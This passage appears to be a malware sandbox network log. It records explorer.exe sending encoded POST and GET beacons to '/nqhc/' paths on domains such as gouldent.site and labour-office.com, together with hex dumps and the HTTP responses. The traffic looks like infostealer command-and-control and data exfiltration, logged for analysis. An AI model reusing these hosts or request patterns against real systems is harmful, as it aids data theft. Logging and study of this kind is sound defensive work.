4e 30 75 54 51 73 42 53 64 72 4c 6c 57 65 38 42 4c 59 33 75 66 7a 4b 61 36 46 5a 64 6b 77 51 62 59 4d 53 48 6e 31 6c 71 4b 55 6e 6d 6f 38 4d 35 68 52 71 77 4c 63 4a 36 34 64 67 53 7a 33 33 6f 77 45 77 4f 64 64 51 68 42 4c 62 49 61 50 43 56 4f 56 54 37
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB8zL8UQk0xOxnLslI(yvvbr2_fJ3drQ9OkoIzEQ3KyP4dwo7nsnQ1AySTRawIg1lUWARX122ytfT2irTM3c6HNzQctoHKhHER8XzfDoD1bh1b8Vo0Nt4CE6mpgeMQaFKp8Qvjyp~M6ipGYxQCX4zh9HMdvuW3WPHRtgNxO6kC8f48SiyYNgWLuIZATCeIAK4BmhaZvyMHJ0ec4QGzBvj7wUtyABxPZaz0yqELS7TU2VHwWqa5h7s7xkkauf24J5g-RzukJOORNH079DBYEH0zv3JUs96F1Usd2_Gna9usKqlOBMlz2qTgyWHc7JBQF_i4FcJO6qpZsFrPibWR~-eUuucwOb8ZyLCktz0Nmup2ag2f4ts6LzEAiEq5CVpasAXw91uW(M(vxgf75nSdmo1k8uIXuHZAG4k3iBodAPiHAyysXVbSNaJ2cSTMzUAUIGF0bCspQU2mIkvwhr4GvvHRjq3uoRmbSMATDqxaxVKavbn24-YR9RIvh_(jACz9rlmjRSbapTQQBNwvDyz3m5~FEMo1ea5YvPsJKNLa0PdRhzReirci7NErt0zAr-qjmudE3LCfBACRSOSswMU2YaRqZe3eB4n4ln1f3fC_rtD6LK(tuoB_0aXuDvwtUsMfHfoDxM3O2khxD5oXCv0YE2Oq1AvewKDq9gAivx21qv5ukYBee_vRHVlb7VhnevO1qhFNZxANxCHJHifY2i1umoys0qOp9S2G8rx2MykLephkxMEd~0x1wnt3A614S3drgRxdMTii6ca_5URv(APWJI0TUYfV1iIc0W~7UPxtX-qX58TYvLEQjE4bvfPQRQLv~IEUgUSz5KVbAvrs2ubrO9hWldjMNlAziSAZz0ncq3KiVNHlT8v6aeLOMVk4OqSnKe7Z5Zjq(kQqBFd9lDAIhD3SCYv_REtWOJz7(h9yJkUgCz0G6f7SAhznbE9wr5e-ANj29MPOENik2LBf2zSpUe39yxhmeE0vrGoktuW0aWIfU1MgZ9J4tP1PC7~BUjK6cRu4GhHGF4eR03ZNYawog5PAqhNgjNJ1VyXs1jOYhJ3l5T4KxSvHFHzBgajIfHGBCf1ouIHzPIzEwNcjCfVJFFwDITZ-JkWRKw~VwkGUW1xOeUS-7Dl3Gr93hDIZB-7hjbPDAhocrkWUGgZ83h3qmpmEfYD7ojqAAcwEaYhNXobdDdmtwiv3sMwyH1bcco4Ecb9rLHiSHHxmj2mrgY2N0uTQsBSdrLlWe8BLY3ufzKa6FZdkwQbYMSHn1lqKUnmo8M5hRqwLcJ64dgSz33owEwOddQhBLbIaPCVOVT7DVadkeEaLtw9rs6pWsasZ8rqCmu35Okbs3Pa63SkOA6SS5_O_WryzAkw7LD8_G2~o~UNju48aOXVgkVQLTTfowIangsu1ljWsVd8-OpOgA1l3iIn3QU9zl1CHva8kZoAB5rkpoMYqBqmiCM2zdkT7OdRwP3di6I8V~AkjwoRtIQMz2fO8oHkWZnXrKSowikA3~U~0IpKEADpcdrdo6o0Uz7Dcsmvoe0PvkCIC9ISoNRfjzIY0f30WCMjzz99LStqdYG4-wLXPLrjioO93f6r-uzaYrl4JWXhPol00L-lOD0wsniNgV8GTtwHUeaZopLQvr414ujYBNmUphoq6NIEm7Fbv8DUPLpu5NTW_Y71KkyjLYEEPiy1JhiEOR8cI9Kv8IazTcXHmOEVtIGFKrYZY6v8FvgIWVFIYL53_mChxK5QfCv6Cwt5F0WGrUif2SVdpeCbPsu4j3Dmzz82mvmZgThORs64lcvWUpb(v7fEG12r-q5xekN0AGedx(rD_vd9QPafkemONulqcRrFWgbiLFJ8g80ZMVLWsg_(hkavUASzhjtkd8C9qEfyS(uWGrKqM24PA9oVmLZu4nv9z710PbYPrkt6SpaXjQ6cfSGWBTT2nKfR7hr3laXee2vCOn9ZePUasQscYurZWxG5PszfZVgTlU19N(vf5x5k-5mVaavLu46CHAjf4iFXtFuKoF-MExV0DZ3FRbjOaon6EcXG5YQM4LxpHIuXdsLPBly7tVmlKGXaVKgftlWWOSTQYihWml95YF-0_ZUB7chJg7KTmzfkuIXPhDxTPxBmIrV2ZnFOmFkszmw5CU1LY0YYaY27MVo0zd7P9zN6Bj8~CCaPOtLPRMVSH54uIxXYCMr5W1wB-vD8eK2i1UOfxhq7C6plvi1IrYBh4y1iRJU9YprAGpTmJSIuOkNS2c05b8PqpfemvqbGVcdKLoW3MldLZc3aOE2Iv9EEtEm8oTfjkt3AuDjygINjEO6vkryLn(4qPGuROESrCyi0bLWHuLNcT7R9lxVxVCw(B7sIlNADVbCdiumUEHvtmLgqCsKKaEcfTPXIl~SUnZnBXtPCYEFT4yoFNWRFxhALytCyD2dmidLUj5A6gAR7XAJvJsVx912ECq_lXJSkluGed56TqTHqZU0zwLpyk1uVySIdgHOFTOvKNYd7EqmuyGskErbcKbIL9qeTLGBfpSA3DrYtRrYxIbwb0LcLBItQzU9sNUGvCxWHYMJq8BPf5BdKn9aIewYu33qN19NnI7PavKNHw9UNbqL5Vd5C4fhs6k43q2-qz9296gC4TvKYuC-Scgmu0K8CfhKIw2Kz9y0tnXON87sh1P7(JBOeqWhywHaHtj0LepkL07soWdhSBGfNH4RJdG211gVrJIJLAph8W6WCqCTjLHyfEhAIRshcWtt32W9H94xFwLK6L51LS0kSnKf6Mcop4oym3XClYE6SZI3A4tWfkOTZFjmG-Iyz00Ogs0V0t5EfaT1XYg1VnZ5SEUtk6CaYV3oG2tHCcuuolHxLUGjeFrSo-0oHDwrpPmc2cJOBKqWfvCIPDR4nt(66NxYnINfL1rnAAoH0aJkAxOJG_~cADF69LZvnYkTRHDoir5q0N6KRswtv7zkY0hyzqWAt6VtddxIFwmTLp7h5CCWKTS1tOF-~NMzvOPwFgSQD6~nvYAtoxAB0rd6GM1pgfVB(gNrbW9dC7hEGxIByQoaAUtCvBvOlEDRBC(bKWks~umS4yOEjnhGr8f1Du4AvDw3CgIGCManj3N5E-9lUJf-QPk4dHfnbfEFyFV2uXK34c9QmBM5opuA2WtlsyyZLGqtKxjm~Bx1DZ4FbKvUbANGoFNPMpnZBMa_rU7229IwCLvrkYrvrICzwUqUObRxCm0JUwZOLMopFDLsf-U8XG2pYxT1tdHz8f2Fnt(pNlbSV9s-QQRMVz3IDX3PvysAjGYna4aSZtltDTlsV-ygBScBjKFn9gEQnuDyhyiKXXDoxcuIXtc6j_sH6rHowZsQIFbjhGbhLT6pYMY3CuoGyF667ie1Vpa8OAkcUs4AiZz7HZYFq5xLUcFs0mleM15TpIw0mXbNAAWVMxtvOh9Q9bfmaSqjcGeezYKPsQ1ZLQzPphnA4yvxRe99ejKJg7g3nAHhMfP4rDAXFAQRgvA0PtWiFDiM12F4l9sRW4I54LmGqRavtXz8beI11Dw9jUZhsrgzKaziK1EIpBrJLqCIFQvbHXOrnbYLSkQrQbwn4aIwFcDqN_~NgPVyn8bKs9PKv90LyIgKD5ItOInaBVw_tyzIfOttqOl8sR7yI5C8dzWK~F~U4oyKZE9KFk87dkOeX7R2yEEv32vB83fgCt2UFWIHgmfL6S0vN4gWKzPSs0mvTYUDDl3H7lkUZF02nt6xgfyK9bTZxvnbi_pVFEddpw13ubmgiNHIXRIvHYOa5SKXs6sdBMrNviNBLVf5UrI6hcDXpFA_VYwvHFjcqMlLW9I3vvcTx8GLh5kPAs3Zfhw97n4NAgt7MHJu3gQJqmknwAJTiI~1v_m0td(RD7ZfZkS6mBTfcx9Jg7NYlHD8mH~Uv4PaIxg6EpGKWe6yxUIR74qwwZtENiASN4U1UcQt(kdPOeQ3XDU3E3QsCCOifOwyFwH1foBQKdPh7t7MPN9ezWgiH6ByxbDxlBwnFWD0KeB6bjPZWOfcDUcAbbNkwDrJAvo6NZFPc7uNYf3iFs~Zcwt9
                                                                                                                                                                                    Nov 21, 2022 19:25:22.321672916 CET2032OUTData Raw: 32 42 68 46 5a 6a 55 6a 4d 79 61 64 4f 44 64 36 34 46 41 6a 39 77 72 4f 77 64 48 42 51 64 42 28 6f 4f 63 4d 38 63 77 5a 6e 36 68 46 6d 65 50 55 61 7a 7a 4b 36 70 6a 39 38 6c 38 47 50 34 6a 49 54 4f 6a 4b 46 73 56 73 70 5a 72 57 48 5a 72 76 4a 32
                                                                                                                                                                                    Data Ascii: 2BhFZjUjMyadODd64FAj9wrOwdHBQdB(oOcM8cwZn6hFmePUazzK6pj98l8GP4jITOjKFsVspZrWHZrvJ2i2g0h~fwvZ385l3tQR-GNY2vToFREM7XwNdt9nN3KUSljCQNPAzPkkMPy2lPRl9xqWbeJK6Me53kjrLD5~gooKUq0JOMaIxdn53ARi2NIeZAcn_(pXrfBbAma8yllfH1z3clj2p3tLKAsxHa9DeyPSp5Ww-3mdsgr
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484761953 CET2034OUTData Raw: 61 74 61 42 50 78 59 32 79 30 4d 78 49 45 52 44 65 41 59 52 32 78 32 52 5f 38 74 75 35 70 78 76 59 58 6b 6d 73 68 4a 66 72 52 71 68 41 31 53 4c 66 71 36 43 37 4d 41 37 64 62 64 45 42 58 5f 50 43 37 69 63 72 36 33 72 61 4c 65 63 4c 36 53 53 59 78
                                                                                                                                                                                    Data Ascii: ataBPxY2y0MxIERDeAYR2x2R_8tu5pxvYXkmshJfrRqhA1SLfq6C7MA7dbdEBX_PC7icr63raLecL6SSYxS5Hqlci95Gn~jLWxtAE(EMHq1M_HR881kl2e3BVxwR2uZUhHSndGp1AYKQ0QEGqtJokCudNh7~np-rR6kHkG_asDF~fr3dhHG5OfpOZo5sIX530H5zYOraBPL6ks0vHDofO6axH36LCdQKpUfcGNQnW~Teb9_8zX6
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484942913 CET2044OUTData Raw: 4d 73 77 77 72 39 79 38 7a 54 62 42 43 39 4a 74 41 70 65 33 51 68 65 72 4b 32 34 69 66 45 48 31 4a 5a 4f 30 58 51 34 42 50 78 4e 4c 5f 35 6f 67 69 58 5f 4d 49 58 5a 42 69 41 65 76 75 32 50 63 65 77 37 49 34 49 66 33 6c 61 46 5a 59 62 38 6e 6b 79
                                                                                                                                                                                    Data Ascii: Mswwr9y8zTbBC9JtApe3QherK24ifEH1JZO0XQ4BPxNL_5ogiX_MIXZBiAevu2Pcew7I4If3laFZYb8nky3nBOTw2~3skLFDeXlTNdMZGLet169CghV19cw9g~JI30NLZQHTErRYzFO(r4gkZZz~K4_y1LKcwO8kn3I2_WRkT0j93hRmFCTteE2keqh~6nnaCYQLRd_MfQhuaLk5_uy8isO4fbSiNhV8_iBK6nWPwP_eixEkHJt
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485049963 CET2053OUTData Raw: 5a 6f 4d 59 55 4b 59 62 31 36 6f 4e 35 48 6f 78 59 6e 54 75 44 63 54 6c 56 70 79 5a 41 32 68 36 37 35 4e 35 76 63 76 69 5a 71 6a 76 4f 42 47 5a 5f 76 33 77 64 67 32 33 6f 42 38 50 47 79 30 59 35 53 4b 4d 63 57 5a 38 4d 35 52 70 42 54 44 35 6a 37
                                                                                                                                                                                    Data Ascii: ZoMYUKYb16oN5HoxYnTuDcTlVpyZA2h675N5vcviZqjvOBGZ_v3wdg23oB8PGy0Y5SKMcWZ8M5RpBTD5j72eHsBvWa81F9hNPjziSZ_8XQ5LusFyQAtAThhdU~n41Zb8QbIwoNy3ETkqt3GQhcFjPr8Y9f2F53-ns7paiiBmfyuunAGUduXDnd9vHomOxqRbBADO2tlfeHvd-pY78ocqC3qCUUofeI6o2sxaDk8h_nQ82yFYx52
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485270023 CET2054OUTData Raw: 48 6a 4f 7a 4b 61 79 66 71 51 35 53 30 75 58 5a 4c 6a 4b 51 67 35 38 67 37 44 39 75 70 37 57 45 54 33 79 44 57 38 42 4f 51 4d 44 39 4a 64 73 44 4d 70 78 4b 6e 7e 61 65 48 33 39 78 76 73 6b 6c 55 70 4d 37 56 75 5f 4f 45 36 61 78 2d 6c 71 48 62 78
                                                                                                                                                                                    Data Ascii: HjOzKayfqQ5S0uXZLjKQg58g7D9up7WET3yDW8BOQMD9JdsDMpxKn~aeH39xvsklUpM7Vu_OE6ax-lqHbxTuKhd7L(c8rxUxIfKuM8E2NYcJ8~sTtcHKINU6R9wXbdqu7TSH9t0h_VwCCDXmgR5BYQg3thmF9xae4rCq4Alf-Wv2FKrW3tn6HWgoKjybfUYBpXNLnapJzKEzhcCrI~lCH~VpvMyc2XusRxeFP~xLx8B8wu3Ib(0
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485455036 CET2058OUTData Raw: 61 72 61 52 4e 4d 37 7e 30 6c 4c 6b 72 57 38 45 39 4a 54 37 34 73 46 42 30 74 46 58 64 37 6e 4a 69 6d 69 38 58 36 68 64 41 36 54 39 54 30 35 69 50 78 62 55 34 6e 6b 47 42 76 38 6d 31 31 72 5a 5a 7e 52 65 44 6e 74 42 41 7a 79 52 6a 30 4f 48 78 54
                                                                                                                                                                                    Data Ascii: araRNM7~0lLkrW8E9JT74sFB0tFXd7nJimi8X6hdA6T9T05iPxbU4nkGBv8m11rZZ~ReDntBAzyRj0OHxTzVMIrZz7h5ttAEha8Af6VnmkIqtj7Hyagla94DGGtyOy1PZwXf2jMnoIiyXjRP8HgbDpfrv467nCOCxaMxSu9Iosa4tbcujL3D2xsPuNfd7qToEOf0Zo7r7Xe0c3T(teCeHlG9jfD2ErHw8HSRxnslC2Tv8MwpGZz
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648072004 CET2061OUTData Raw: 5f 71 6b 28 74 6f 6e 31 42 64 4c 43 78 51 6d 6e 4f 61 34 6d 2d 74 4d 66 31 6c 6a 6f 6f 46 77 68 51 6a 74 4f 4b 37 39 4a 30 51 61 36 48 4c 4c 64 42 54 6d 36 5a 6f 70 66 33 64 31 65 51 71 6b 68 57 4e 44 59 54 4f 48 54 67 49 2d 28 62 44 74 4f 34 71
                                                                                                                                                                                    Data Ascii: _qk(ton1BdLCxQmnOa4m-tMf1ljooFwhQjtOK79J0Qa6HLLdBTm6Zopf3d1eQqkhWNDYTOHTgI-(bDtO4qf1kO1DchNfVK2lyL1lVeLTALQqaRuvZ57fLxMzy0aawAlX1Twm4otE6mncRFgGKWlJ_QoumHqMbhBY6iHuSRXlvqp7XQ4lNMr3GR653uB(3uDjz1qafu144Ja4Aplx9BeTKYcA8GF(RWqchgVKKL-EIOlQXc47fsn
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648192883 CET2071OUTData Raw: 42 6a 57 5a 6a 5a 58 28 43 70 6a 58 79 57 70 59 30 67 2d 28 66 65 4b 6b 46 71 51 74 66 74 4b 4d 59 32 6e 73 65 69 45 59 4b 48 57 7a 64 48 6e 33 74 5a 68 43 36 59 6b 32 50 41 2d 78 56 37 54 74 77 52 4e 6a 64 62 6c 41 59 64 2d 5a 64 50 74 36 76 57
                                                                                                                                                                                    Data Ascii: BjWZjZX(CpjXyWpY0g-(feKkFqQtftKMY2nseiEYKHWzdHn3tZhC6Yk2PA-xV7TtwRNjdblAYd-ZdPt6vWRbVmnmF64UxsgB2NXpgkWkNFymXI8fQSe~SKTZRw2MxsYyEf_Z85UX1mVShfzGBl3ILgsfQpTSTD0vCxB9w8P4JqCR_NfolPozhjrIX6VVd(tuhXvOqI5rCeJsW1avx71sVBbfiWDs-YFo04g07Of60Eb8nsMJCXT
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648268938 CET2071OUTData Raw: 71 4f 48 28 71 53 43 6e 4d 65 6f 58 69 63 76 72 4c 46 55 38 38 39 36 74 73 63 70 6d 48 4c 56 37 76 6d 34 4f 37 64 64 64 6b 75 74 6d 79 34 4c 6f 6d 58 33 6c 4b 66 57 39 47 63 34 6a 4d 35 71 72 4a 71 55 4b 48 66 6c 6f 46 58 47 77 37 65 44 59 68 76
                                                                                                                                                                                    Data Ascii: qOH(qSCnMeoXicvrLFU8896tscpmHLV7vm4O7dddkutmy4LomX3lKfW9Gc4jM5qrJqUKHfloFXGw7eDYhv2FPqmTb60W9TZtks76kQk6xq8eZZDwaKTGv~25nlR1C(kU7oENYarMeYSBlgAyU0_bjlg94vpmaZ-Y3nR3alI3krvs4Tsq-nzOjWX71wesOm1d3rPknZeDe41D0exawdbvdro2xPzRPZYsM0kfL6k4587zfk7gMu-
                                                                                                                                                                                    Nov 21, 2022 19:25:22.951284885 CET2073INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:22 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    87192.168.11.204991366.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:24.508055925 CET2073OUTGET /nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:25:24.779979944 CET2074INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:24 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    88192.168.11.204991445.33.23.18380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:29.934031963 CET2076OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.labour-office.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.labour-office.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.labour-office.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 47 66 39 65 6d 56 74 59 77 50 4b 52 4f 5f 37 59 52 6f 53 69 35 4b 68 76 4b 32 38 32 4e 35 59 72 71 69 61 32 37 31 71 54 36 66 71 49 50 36 41 75 32 4c 4c 2d 7e 4a 33 53 4b 4e 74 62 71 57 57 39 68 4f 7a 6f 37 4a 4e 61 47 38 6f 67 7a 69 4b 6a 51 69 5a 73 41 67 6b 6f 6d 53 58 6d 69 64 78 38 45 78 61 6d 6c 62 6f 7a 31 36 6e 74 77 71 71 73 63 54 5a 65 53 4d 51 4c 6a 2d 58 43 65 7a 34 61 59 62 4a 5a 7a 6a 71 55 70 65 45 43 41 33 4a 71 72 75 76 66 4e 79 74 62 31 57 38 33 4d 57 57 55 68 36 6a 66 64 47 71 38 6e 41 48 59 6e 5a 38 4f 49 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=Gf9emVtYwPKRO_7YRoSi5KhvK282N5Yrqia271qT6fqIP6Au2LL-~J3SKNtbqWW9hOzo7JNaG8ogziKjQiZsAgkomSXmidx8Examlboz16ntwqqscTZeSMQLj-XCez4aYbJZzjqUpeECA3JqruvfNytb1W83MWWUh6jfdGq8nAHYnZ8OIg).
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073663950 CET2077INHTTP/1.1 200 OK
                                                                                                                                                                                    server: openresty/1.13.6.1
                                                                                                                                                                                    date: Mon, 21 Nov 2022 18:25:30 GMT
                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                    content-length: 4529
                                                                                                                                                                                    vary: Accept-Language
                                                                                                                                                                                    content-language: en
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64 39 7a 49 69 35 4e 42 59 4d 47 37 67 66 67 41 79 69 77 3a 31 6f 78 42 55 32 3a 35 2d 61 65 6a 6e 69 4e 59 52 4f 67 4f 71 52 46 56 35 6e 42 44 72 35 41 4d 77 6b 2f 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 